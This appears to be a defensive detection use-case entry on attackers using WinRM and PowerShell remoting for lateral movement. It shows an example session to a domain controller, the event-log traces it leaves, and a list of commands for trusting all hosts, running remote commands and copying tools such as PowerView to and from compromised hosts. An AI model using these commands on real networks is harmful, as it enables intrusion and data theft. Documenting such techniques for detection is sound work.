UC0042: WinRM or Powershell Remoting for Lateral Movement
Summary
| ID | UC0042 |
|---|---|
| Brief Description | WinRM or PowerShell remoting for lateral movement. |
| Author | Alex@Cyberok |
| Creation Date | 2023/02/28 |
| Modification Date | 2023/02/28 |
| ATT&CK Techniques | |
| Tags |
|
| Linked Response Playbooks | |
| Artifacts |
Description
WinRM is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services) It may be called with the winrm command or by any number of programs such as PowerShell. WinRM can be used as a method of remotely interacting with Windows Management Instrumentation.
Lateral movement combines two techniques: extraction of confidential; and information after gaining access.
Attack mapping
| ARTIFACT | OBJECT | DESCRIPTION |
|---|---|---|
| Attack Prerequisites | ||
| Credentials | User's credentials (login and password) | It's used as arguments for lateral movent actions |
| Side Observables | ||
| Remote Session | Remote session | Open remote powershell session via WinRM |
Attack results
Successfull attack allows to execute commands on a remote host with remote session.
| RESOURCE | DESCRIPTION |
|---|---|
| Attack Prerequisites | |
| Privileged Access | Compromised host with privileged access |
| Credential Access | Any user's credentials |
| Result Consequences | |
| Remote Code Execution | Attacker gets an ability to execute commands on the remote host |
Attack progress
1) Attacker establishing a PSRemoting session from a compromised system to a domain controller a-dc01:
New-PSSession -ComputerName dc-mantvydas -Credential (Get-Credential)
Id Name ComputerName ComputerType State ConfigurationName Availability
-- ---- ------------ ------------ ----- ----------------- ------------
3 WinRM3 a-dc01 RemoteMachine Opened Microsoft.PowerShell Available
PS C:\Users\mantvydas> Enter-PSSession 3
[a-dc01]: PS C:\Users\aegorov\Documents> hostname
2) Note the process ancestry: on the host that initiated the connection, a 4648 logon attempt is logged, showing what process initiated it, the hostname where it connected to and which account was used.
Additionally, %SystemRoot%\System32\Winevt\Logs\Microsoft-Windows-WinRM%4Operational.evtx on the host that initiated connection to the remote host, logs some interesting data for a task WSMan Session initialize :
Since we entered into a PS Shell on the remote system (Enter-PSSession) , there is another interesting log showing the establishment of a remote shell - note that the ShellID corresponds to the earlier observed Correlation ActivityID:
Possible usage
Empire
For engagements that utilize Empire there is a PowerShell module which can execute code remotely over WinRM in order to expand access inside a network. Requirements for usage of this module are: local administrator credentials, a listener, an agent and a target host.
Post exploitation commands can be executed on the host that has been compromised through the WinRM service.
Additional Useful Commands
# Enable PowerShell Remoting on the target (box needs to be compromised first)
Enable-PSRemoting -force
# Check if a given system is listening on WinRM port
Test-NetConnection <IP> -CommonTCPPort WINRM
# Trust all hosts:
Set-Item WSMan:\localhost\Client\TrustedHosts -Value * -Force
# Check what hosts are trusted
Get-Item WSMan:\localhost\Client\TrustedHosts
# Execute command on remote host
Invoke-Command <host> -Credential $cred -ScriptBlock {Hostname}
# Interactive session with explicit credentials
Enter-PSSession <host> -Credential <domain>\<user>
# Interactive session using Kerberos:
Enter-PSSession <host> -Authentication Kerberos
# Upload file to remote session
Copy-Item -Path C:\Temp\PowerView.ps1 -Destination C:\Temp\ -ToSession (Get-PSSession)
# Download file from remote session
Copy-Item -Path C:\Users\Administrator\Desktop\test.txt -Destination C:\Temp\ -FromSession (Get-PSSession)
Attack diagram
References
A look under the hood at Powershell Remoting through a cross plaform lens